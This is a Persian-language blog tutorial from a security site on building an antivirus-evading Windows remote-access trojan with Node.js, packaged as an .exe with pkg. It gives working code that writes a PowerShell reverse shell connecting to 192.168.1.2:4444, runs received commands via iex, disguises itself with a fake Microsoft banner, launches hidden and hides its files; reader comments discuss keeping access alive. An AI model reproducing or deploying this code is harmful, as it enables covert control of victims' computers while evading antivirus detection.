آموزش ساخت رت FUD ويندوز با استفاده از Node.js
با سلام خدمت تمامی کاربران عزیز سایت Vip Security
دوباره با یک پست خیلی عالی و جذاب در خدمت شما دوستان عزیز هستیم
خب شاید براتون سوال باشه که مگه با نود جی اس ( node.js ) مگه میشه رت یا رات ویندوز ساخت؟😲 باید در پاسخ بگ که بله ! 😎
خب اول از موازد پایه روع کنیم و بعد بریم سراغ آموزش ویدیویی 🙂
رت چیست؟
Node.js چیست؟
js یک پلتفرم کدنویسی سمت سرور است که بر پایه موتور جاوا اسکریپت مرورگر گوگل کروم کدنویسی شده است. این پلتفرم توسط رایان داهل در سال ۲۰۰۹ ایجاد شده است و در حال حاضر آخرین نسخه آن ورژن ۰٫۱۰٫۳۶ میباشد.
بر اساس اعلان مستندات رسمی تعریف Node.Js به شکل زیر عنوان میشود:
Node.js یک پلتفرم ایجاد شده بر پایه موتور جاوا اسکریپت گوگل کروم است که باعث سهولت ایجاد و مقیاسپذیری برنامههای تحت شبکه میشود. این پلتفرم از یک مدل I/O رویداد محور استفاده میکند که مسدود نشونده (non-blocking) است و همین امر باعث کاهش فشار موجود بر روی سرور و افزایش کارآیی میشود و این امر برای اجرای برنامههای مبتنی بر داده که بصورت بلادرنگ (Real-Time) بر روی سرورهای نامتمرکز استفاده میشوند بسیار مناسب است.”
Node.js یک پلتفرم کد باز برای گسترش برنامههای سمت سرور و تحت شبکه میباشد. این پلتفرم بر اساس زبان جاوا اسکریپت نوشته شده است و میزبانی و هاست Nodejs قابلیت پیادهسازی بر روی سیستمعاملهای ویندوز، لینوکس و سیستم عامل کامپیوترهای اپل را دارد.
این فریم ورک کتابخانهای عظیم از ماژولهای مختلف جاوا اسکریپت را فراهم میکند که سهولت در گسترش وباپلیکیشن ها را تا حد زیادی فراهم میآورد.
چطور میشه از پروژه Node.js خروجی اپلیکیشن ویندوز یا لینوکس گرفت؟
خب شاید براتون عجیب باشه ولی تعجب نکنید ! این روزا از زبان جاوا اسکریپت تقریبا در همه جا استفاده میشه از وب گرفته تا اپلیکیشن اندروید ، ios & macOs و یا لینوکس و میشه گفت آینده واقعا عالی داره
npm install -g pkg
با استفاده از دستور زیر میتونید خروجی مخصوص به پلتفرم مدنظرتون رو بگیرید در اینجا اسم پروژه ما index.js هست و خروجی exe میخواهیم
pkg index.js -o MyApp.exe
اگر در حین احرای دستور مشکلی داشتید حتما دستورات زیر را وارد کنید و دوباره خروجی بگیرید
npm install --global windows-build-tools
npm cache clean --force
پیلود چیست ؟
payload در لغت به بار و محموله ای سود آور می گویند و این نام را از این جهت برای ان انتخاب کرده اند به دلیل ان که payload شامل کد های مخرب است.
پیلود FUD چیست؟
FUD یعنی Fully UnDetectable (FUD) by Anti-Virus (AV) software به زبان فارسی یعنی پیلود مخربی که توسط آنتی ویروس ها غیرقابل شناسایی است
آموزش ساخت رت ویندوز FUD با استفاده از Node.js :
برای مشاهده ویدیو حتما vpn خود را روشن کنید و حتما کانال یوتوب ما رو هم دنبال کنید !
کد پروژه استفاده شده در ویدیو :
var spawn = require("child_process");
var fs = require('fs');
fs.writeFile('my.ps1',`$c = New-Object System.Net.Sockets.TCPClient("192.168.1.2",4444);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.'n'n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()`,function (err) {
if (err) throw err;
spawn.exec('powershell.exe -windowstyle hidden -file my.ps1 ');
spawn.exec('attrib +h "my.ps1" | attrib +h "2.exe"');
});
مطالب زیر را حتما مطالعه کنید
تحلیل و اکسپلویت آسیب پذیری Spring4Shell
حمله MITM چیست؟ ( آموزش حملات MITM )
آموزش تست نفوذ پروتکل SS7
آموزش نفوذ به Android , IOS , Windows , Linux با استفاده از ابزار Venom
تحلیل و اكسپلویت آسیب پذیری log4shell و روش های رفع این آسیب پذیری
آموزش اکسپلویت آسیب پذیری javaScript Prototype Pollution و نحوه یافتن آن
2 دیدگاه
به گفتگوی ما بپیوندید و دیدگاه خود را با ما در میان بگذارید.
عالی
بعد اولین اجرا
پاور شل end process کردم بعدش هرچی فایل باز میکنم دیگه وصل نمیشه
و تو پس زمینه هم پاور شل در حالت اجرا نیست
مشکل چیه؟
سلام دوست عزیز
همانطور که در ویدیو گفتیم ما دسترسی شل معکوس را از طریق اسکریپت پاورشل میگیریم و در ویدیو هم گفتیم که وقتی خود فایل رت اجرایی را end process کنید دسترسی از بین نمیره ولی اما پاورشل را end process کنید دسترسی از بین میره